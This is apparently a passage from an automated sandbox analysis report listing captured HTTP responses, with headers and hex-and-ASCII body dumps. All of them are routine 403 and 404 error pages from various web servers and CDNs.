                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:35 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:35 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:36 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMeMFZ26VdsJbR9Jf1fRFJeq,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1690487016.3291091783084181X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:43:25 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:43:28 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: ee9530a0-cc92-473f-8954-cec51de9aa0eCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LFxwVJlR8JjFEgxAhJA%2BUosKuiZ3cWuygSYLhqkqRiTswesO%2BPtdMSHatRFbLb4A0m3%2FxkI9A1pV%2BhLAuVUfB6uK1RLt7xbD2hTgI7BmEMYKHx4AXm2D4Z%2BFRICJE5U%2BhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.000002Server: cloudflareCF-RAY: 7ed75f590a3f1da0-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 5f3ea170-93f8-4a62-9ae6-a3f79068c4cdCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pQwqtJNuRkRFAntj1uH5e8mv5quXd72Vw4tmGBdPaEgBLvoDOC3RfIViNfc%2F9ZSltBg2Pm3QWxVQdInA6bNKWc3ta058qbm6ur6Bo8NYT7ltwI9WBVjvmsukC0wNRyw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.999929Server: cloudflareCF-RAY: 7ed75f5c8ae61e50-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEDate: Thu, 27 Jul 2023 19:43:44 GMTX-Zen-Fury: a6c000e738026e45c798f85dd4d272f4b2fea4b9Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 34 36 30 22 2c 20 31 36 39 30 34 38 36 39 38 31 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 36 39 38 31 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 33 36 31 33 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 34 35 3a 34 34 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8460", 1690486981, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690486981 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:43:47 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:44:03 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dY2rQmKfZP%2Bsy8%2Faddh6NN5UlGL3BiBA6B4DMJ7Cwa9sB7bMIPP4gLeNoIDMiPB1JSAYX1q%2BVo8f6Cl0DEjX9cOTADSFmRNZzbE9f3l0h3dNQlJM6OGWzRcc72lBGaSE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75f95da8e35ed-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Clo
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487028.1624078240321328X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:43:48 GMTX-Served-By: cache-lin2290020-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojILGWbh2TIJ0L1y7rVT4gFiP,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:48 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 